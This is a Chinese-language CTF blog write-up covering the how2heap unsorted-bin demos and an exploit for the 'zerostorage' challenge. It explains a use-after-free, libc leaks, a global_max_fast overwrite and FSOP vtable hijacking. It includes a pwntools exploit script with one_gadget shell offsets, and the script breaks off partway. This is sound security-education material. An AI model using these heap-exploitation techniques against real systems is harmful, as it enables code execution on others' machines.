<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('http://yoursite.com').hostname,
    root: '/',
    scheme: 'Muse',
    version: '7.7.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="how2heap - unsorted_bin&amp;zerostorageubuntu16.04     libc2.23 unsorted_bin_into_stack.c123456789101112131415161718192021222324252627282930313233#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#incl">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap - unsorted_bin&amp;zerostorage">
<meta property="og:url" content="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/index.html">
<meta property="og:site_name" content="Coldshiel&#39;s blog">
<meta property="og:description" content="how2heap - unsorted_bin&amp;zerostorageubuntu16.04     libc2.23 unsorted_bin_into_stack.c123456789101112131415161718192021222324252627282930313233#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#incl">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/1582446182507.png">
<meta property="og:image" content="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/1582718464993.png">
<meta property="og:image" content="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/1582727103137.png">
<meta property="article:published_time" content="2020-02-27T04:59:45.000Z">
<meta property="article:modified_time" content="2020-02-29T10:09:21.320Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="how2heap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/1582446182507.png">

<link rel="canonical" href="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>how2heap - unsorted_bin&zerostorage | Coldshiel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Coldshiel's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/26/how2heap-unsorted-bin-zerostorage/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshiel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          how2heap - unsorted_bin&zerostorage
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-02-26 20:59:45" itemprop="dateCreated datePublished" datetime="2020-02-26T20:59:45-08:00">2020-02-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-02-29 02:09:21" itemprop="dateModified" datetime="2020-02-29T02:09:21-08:00">2020-02-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="how2heap-unsorted-bin-amp-zerostorage"><a href="#how2heap-unsorted-bin-amp-zerostorage" class="headerlink" title="how2heap - unsorted_bin&amp;zerostorage"></a>how2heap - unsorted_bin&amp;zerostorage</h1><p>ubuntu16.04     libc2.23</p>
<h1 id="unsorted-bin-into-stack-c"><a href="#unsorted-bin-into-stack-c" class="headerlink" title="unsorted_bin_into_stack.c"></a>unsorted_bin_into_stack.c</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;stdlib.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;stdint.h&gt;</span></span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">  intptr_t stack_buffer[<span class="number">4</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">  fprintf(stderr, <span class="string">"This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n"</span>);</span><br><span class="line"></span><br><span class="line">  fprintf(stderr, <span class="string">"Allocating the victim chunk\n"</span>);</span><br><span class="line">  intptr_t* victim = malloc(<span class="number">0x100</span>);</span><br><span class="line"></span><br><span class="line">  fprintf(stderr, <span class="string">"Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n"</span>);</span><br><span class="line">  intptr_t* p1 = malloc(<span class="number">0x100</span>);</span><br><span class="line"></span><br><span class="line">  fprintf(stderr, <span class="string">"Freeing the chunk %p, it will be inserted in the unsorted bin\n"</span>, victim);</span><br><span class="line">  free(victim);</span><br><span class="line"></span><br><span class="line">  fprintf(stderr, <span class="string">"Create a fake chunk on the stack"</span>);</span><br><span class="line">  fprintf(stderr, <span class="string">"Set size for next allocation and the bk pointer to any writable address"</span>);</span><br><span class="line">  stack_buffer[<span class="number">1</span>] = <span class="number">0x100</span> + <span class="number">0x10</span>;</span><br><span class="line">  stack_buffer[<span class="number">3</span>] = (intptr_t)stack_buffer;</span><br><span class="line"></span><br><span class="line">  //------------VULNERABILITY-----------</span><br><span class="line">  fprintf(stderr, <span class="string">"Now emulating a vulnerability that can overwrite the victim-&gt;size and victim-&gt;bk pointer\n"</span>);</span><br><span class="line">  fprintf(stderr, <span class="string">"Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem\n"</span>);</span><br><span class="line">  victim[<span class="number">-1</span>] = <span class="number">32</span>;</span><br><span class="line">  victim[1] = (intptr_t)stack_buffer; // victim-&gt;bk is pointing to stack</span><br><span class="line">  //------------------------------------</span><br><span class="line"></span><br><span class="line">  fprintf(stderr, <span class="string">"Now next malloc will return the region of our fake chunk: %p\n"</span>, &amp;stack_buffer[<span class="number">2</span>]);</span><br><span class="line">  fprintf(stderr, <span class="string">"malloc(0x100): %p\n"</span>, malloc(<span class="number">0x100</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>意思就是unsortedbin上有一个chunk，然后模拟漏洞更改了其size和bk，这样再malloc相同大小的chunk时这块chunk就不会被malloc，会被放到smallbin里面去，其中libc2.23中unsortedbin卸下的操作是：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">unsorted_chunks (av)-&gt;bk = bck;</span><br><span class="line">bck-&gt;fd = unsorted_chunks (av);</span><br></pre></td></tr></table></figure>

<p>这里bck就是victim-&gt;bk，所以卸下操作基本都是与bk指针相关，与fd无关。这个代码中只需要将栈上对应的size字段和bk设置好即可，0x100chunk被放到smallbin后unsortedbin中情况如图所示</p>
<img src="/2020/02/26/how2heap-unsorted-bin-zerostorage/1582446182507.png" width="50%" height="50%">

<p>此时可以无限<code>malloc(0x100)</code>都是这个stack chunk，bck始终是他自己</p>
<h1 id="unsorted-bin-attack-c"><a href="#unsorted-bin-attack-c" class="headerlink" title="unsorted_bin_attack.c"></a>unsorted_bin_attack.c</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This technique only works with buffers not going into tcache, either because the tcache-option for "</span></span><br><span class="line">		    <span class="string">"glibc was disabled, or because the buffers are bigger than 0x408 bytes. See build_glibc.sh for build "</span></span><br><span class="line">		    <span class="string">"instructions.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "</span></span><br><span class="line">		   <span class="string">"global variable global_max_fast in libc for further fastbin attack\n\n"</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> stack_var=<span class="number">0</span>;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Let's first look at the target we want to rewrite on stack:\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"%p: %ld\n\n"</span>, &amp;stack_var, stack_var);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> *p=<span class="built_in">malloc</span>(<span class="number">0x410</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now, we allocate first normal chunk on the heap at: %p\n"</span>,p);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"And allocate another normal chunk in order to avoid consolidating the top chunk with"</span></span><br><span class="line">           <span class="string">"the first one during the free()\n\n"</span>);</span><br><span class="line">	<span class="built_in">malloc</span>(<span class="number">500</span>);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">free</span>(p);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "</span></span><br><span class="line">		   <span class="string">"point to %p\n"</span>,(<span class="keyword">void</span>*)p[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">	<span class="comment">//------------VULNERABILITY-----------</span></span><br><span class="line"></span><br><span class="line">	p[<span class="number">1</span>]=(<span class="keyword">unsigned</span> <span class="keyword">long</span>)(&amp;stack_var<span class="number">-2</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now emulating a vulnerability that can overwrite the victim-&gt;bk pointer\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n"</span>,(<span class="keyword">void</span>*)p[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">	<span class="comment">//------------------------------------</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">malloc</span>(<span class="number">0x410</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Let's malloc again to get the chunk we just free. During this time, the target should have already been "</span></span><br><span class="line">		   <span class="string">"rewritten:\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"%p: %p\n"</span>, &amp;stack_var, (<span class="keyword">void</span>*)stack_var);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个的原理也是借助于unsortedbin上的卸链表的操作，当unsortedbin上有chunk，时，卸链表操作有一个：<br><code>bck-&gt;fd=unsorted_chunks (av);</code><br>在这里，我们首先把chunk的bk改成了栈指针，所以在获取bck的时候bck就会是一个栈地址，然后malloc在unsortedbin上成功匹配到chunk之后，即使没有去接着malloc chunk，对应栈地址+2*sizt_t的地方也会填上main_arena的地址，这也是这个利用和上面那个利用不一样（不用修改size字段）的原因</p>
<p>这两个都不难我这里就不debug了，直接撸题吧</p>
<h1 id="zerostorage"><a href="#zerostorage" class="headerlink" title="zerostorage"></a>zerostorage</h1><p>程序说实话好像逆起来有点复杂，直接看流程更清晰明了</p>
<h2 id="程序分析（流程）"><a href="#程序分析（流程）" class="headerlink" title="程序分析（流程）"></a>程序分析（流程）</h2><p>bss段上存了一个记录结构体数组，这个结构体主要是用来管理对应chunk的，分别记录了表示use_or_not的flag、可用长度还有指针（xor了一个随机的mask，导致真正的指针没有存在bss段）</p>
<h3 id="Insert"><a href="#Insert" class="headerlink" title="Insert"></a>Insert</h3><p>找记录数组看还有没有剩余的位置，最多记录0x20个</p>
<p>输入的lenth不能小于0</p>
<p>len&gt;0x1000                     calloc(0x1000) read(0x1000)///set ent-&gt;len=0x1000<br>if 0x80&lt;=len&lt;=0x1000     calloc(len) read(len)///set ent-&gt;len=len<br>len&lt;0x80 calloc(0x80)     read(len)///set ent-&gt;len=len</p>
<p>然后就差不多是读ent-&gt;len长度的数据了，这里的比对操作差不多就是为了申请的chunk在0x80~0x1000之间，</p>
<h3 id="update"><a href="#update" class="headerlink" title="update"></a>update</h3><p>input(index)</p>
<p>check(index&gt;0x1F,ent-&gt;use_or_not)<br>input(len)    check(len&gt;0)<br>if len&gt;0x1000                    a=0x1000    c=0x1000<br>if 0x80&lt;=len&lt;=0x1000        a=len        c=len<br>if len&lt;0x80                         a=0x80        c=len<br>这个也是为了控制大小在0x80~0x1000之间</p>
<p>if ent-&gt;len&gt;=0x80            b=ent-&gt;len<br>else                         b=0x80</p>
<p>if a!=b realloc(ptr_mask^ent-&gt;ptr,a)</p>
<p>readn(ptr,c)<br>然后更新记录</p>
<h3 id="merge"><a href="#merge" class="headerlink" title="merge"></a>merge</h3><p>need ent_num&gt;1<br>input(fromID) check(fromID&gt;0x1F,mergechunk1.use_or_not)<br>input(toID)   check(toID&gt;0x1F,mergechunk2.use_or_not)<br>a=0x80,b=0x80<br>if fromlen+tolen&gt;=0x80    b=fromlen+tolen<br>if tolen&gt;=0x80             a=tolen</p>
<p>if a==b                 cpy_len=fromlen<br>else                    realloc(to_ptr,b)  cpy_len=fromlen<br>memcpy(chunk_toptr + to_len, from_ptr, cpy_len);<br>把from的数据拷到新的chunk里对应的位置去</p>
<p>更新一个新的记录<br>free(from_ptr)<br>清除掉合并的<strong>两个</strong>记录</p>
<h3 id="delete"><a href="#delete" class="headerlink" title="delete"></a>delete</h3><p>这个就很简单了就是input然后check然后free，并清除掉记录</p>
<p>input(id)    check(id&gt;0x1F,use_or_not)<br>free(ptr)    clear record</p>
<h3 id="view"><a href="#view" class="headerlink" title="view"></a>view</h3><p>view就是按记录的长度，输出chunk上长度为n的内容</p>
<p>input(id)    check(id&gt;0x1F,use_or_not)<br>write_n</p>
<h3 id="list"><a href="#list" class="headerlink" title="list"></a>list</h3><p>输出对应记录的下标和记录下来的长度</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>这个题我最开始看了很久主要是因为真的太乱了，特别是前面比来比去的操作，而且我当时没记笔记有点蠢，以后这种比来比去的操作直接记笔记，这样可以知道程序到底是为了干什么</p>
<p>然后漏洞的话基本上第一眼看上去溢出和leak都不行，毕竟什么记录之类的也都在free之后清除了，申请的时候使用的也是calloc，然后再仔细就会发现如果merge中输入的fromID和toID相等的话就会形成UAF，比如先calloc 3个0x90的chunk然后delete第二个，merge(0,0)的话就会把第一个chunk合并成一个0x120的chunk存在记录[1]处，然后free掉这个0x120的chunk，由于是在unsortedbin上所以可以在之前再free一个，设置这个chunk的fd指向那个chunk，再去view的时候就可以leak heap和libc了，而且也可以通过update来更改chunk中的内容</p>
<p>由于这种题是第一次接触，自己也还傻傻不清楚unsortedbin attack怎么用，所以参考了一些师傅们的题解，然后发现这种方法可以用来修改<code>global_max_fast</code>这个变量，然而在我参考的过程中发现，由于原题环境是在ubuntu14系统下，当时还存在一个获取libc地址之后直接获取程序地址的操作，所以原题的思路是在bss段伪造一个堆块，然后把bss给malloc出来，获得mask之后修改指针实现任意地址写。但是在ubuntu16下面这个操作已经不存在了，所以又照着新解学习了很多<code>_IO_FILE</code>的知识</p>
<p>学了FSOP再来分析漏洞，此时已经有了libc地址和heap地址，还更改了<code>global_max_fast</code>，接下来如果使用FSOP的话应该怎么用呢…我第一个想到的还是fastbin attack（写完第一个思路之后回来发现师傅还有一个思路，简直不能再爽23333，所以我这里写了两个解法），之前fastbin attack能修改<code>__malloc_hook</code>主要是因为存在0x7f这个特殊值，但是现在就似乎变得更棘手了一些堆块又不能大于0x1000，又不能小于0x80</p>
<p>….不过果然只要细心一点找还是找的到fake size的，如图</p>
<img src="/2020/02/26/how2heap-unsorted-bin-zerostorage/1582718464993.png" width="80%" height="80%">

<p>我在<code>stderr</code>对应的FILE中找到了一个0xfb的fakesize，这个本来是FILE的flag值，但是既然你有个0xfb我就不客气的拿下了….distance也是足够的，只要劫持你到我堆上伪造的vtable就完事了</p>
<h2 id="Exploit1"><a href="#Exploit1" class="headerlink" title="Exploit1"></a>Exploit1</h2><p>接着上面的想法我成功的跑通了自己的思路奥利给！（还是那句话，用自己的方法写出来真的太开心了23333）</p>
<ol>
<li>首先就是先多申请几个chunk，其中一个大小是0x74</li>
<li>merge 0x74的chunk，这时候能merge出来一个0xf0的chunk</li>
<li>再弄一个merge自己的chunk，此时在unsortedbin链中这个chunk的fd是我们之前0xf0的chunk，bk是unsortedbin，达到leak，而且由于这个chunk是unsortedbin链头，所以这个也刚好用来改<code>global_max_fast</code></li>
<li>然后把0xf0的chunk从unsortedbin calloc出来，为了后面的fastbin attack（毕竟是UAF的chunk，我们有两个记录可以用来改它2333）</li>
<li>把第三步merge自己的chunk也calloc出来，这步只是为了改<code>global_max_fast</code></li>
<li>delete之前的0xf0的chunk，然后改fd（fastbin attack）</li>
<li>这里注意再insert的时候就可以把fake vtable放上去了，为了等下用</li>
<li>再insert就是改写<code>_IO_2_1_stderr_</code>的东西了，注意计算对应于fakechunk的偏移</li>
<li>退出getshell</li>
</ol>
<h3 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./zerostorage'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">g_m_f=<span class="number">0x3c67f8</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">'''libc 2.23 x64</span></span><br><span class="line"><span class="string">0x45216 execve("/bin/sh", rsp+0x30, environ)constraints:  rax == NULL</span></span><br><span class="line"><span class="string">0x4526a execve("/bin/sh", rsp+0x30, environ)constraints:  [rsp+0x30] == NULL</span></span><br><span class="line"><span class="string">0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints:  [rsp+0x50] == NULL</span></span><br><span class="line"><span class="string">0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints:  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string">req = dest - old_top - 4*sizeof(long)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="comment">#todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">insert</span><span class="params">(size,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Length of new entry: '</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'Enter your data: '</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span><span class="params">(id,size,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">	p.recvuntil(<span class="string">"Length of entry: "</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'Enter your data: '</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">merge</span><span class="params">(fromid,toid)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'from Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(fromid))</span><br><span class="line">	p.recvuntil(<span class="string">'to Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(toid))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(id)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">view</span><span class="params">(id)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'5'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'a'</span>*<span class="number">0x80</span>)<span class="comment">#0</span></span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'b'</span>*<span class="number">0x80</span>)<span class="comment">#1</span></span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'c'</span>*<span 